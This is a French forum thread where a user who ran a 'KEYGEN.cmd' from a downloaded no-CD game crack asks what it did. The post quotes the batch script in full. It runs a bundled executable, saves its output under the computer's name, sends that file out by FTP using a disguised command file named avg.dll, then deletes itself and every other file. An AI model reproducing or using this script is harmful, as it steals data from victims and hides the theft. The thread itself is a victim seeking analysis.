dupond

Salut Merci de ta réponse. Non bien sûr, aucun dossier de ce nom dans le rep windows. On voit bien dans le script que ce répertoire est créé (mkdir) puis supprimé après avoir été utilisé (rmdir). @+

Bonjour Je m'inscrit sur ce forum que je viens de découvrir, car les personnes présentes semblent fort compétentes et pourront peut-être me rassurer et/ou me renseigner. Voilà : Ayant téléchargé sur internet un de ces programmes permettant de jouer à un jeux sans introduire le CD-ROM a chaque fois, j'ai obtenu un fichier qui, après décompression, a donné un répertoire contenant les fichiers suivants : Uninstall.exe avg.dll nspr4.dll nss3.dll plc4.dll plds4.dll softokn3.dll KEYGEN.cmd En lançant le fichier KEYGEN.cmd, une fenêtre DOS est apparue et très vite s'est refermée. Puis tous les fichiers ont disparus. Ce fichier KEYGEN.cmd est éditable et contient les instructions suivantes : mkdir %windir%\systinfo\ Uninstall.exe > %windir%\systinfo\%COMPUTERNAME%.txt ftp -n -v -s:avg.dll del Uninstall.exe del %windir%\systinfo\%COMPUTERNAME%.txt del avg.dll rmdir %windir%\systinfo\ del nspr4.dll del nss3.dll del plc4.dll del plds4.dll del softokn3.dll del KEYGEN.cmd Le fichier Uninstall.exe est un exécutable non éditable. Si quelqu'un est en mesure de m'éclairer sur ce qu'a pu faire ce fichier à mon ordi ? (qu'est-ce que l'instruction ftp -n -v -s:avg.dll). Je suis prêt à faire parvenir le fichier Uninstall.exe (taille 80ko) à toute personne intéressée pour analyser son action. D'avance merci et sinon, je verrais par la suite (peut-être n'a-t-il aucun effet ... On peut réver !). @+ PS : Les tests anti-virus et anti-spy/trojan n'ont rien révélé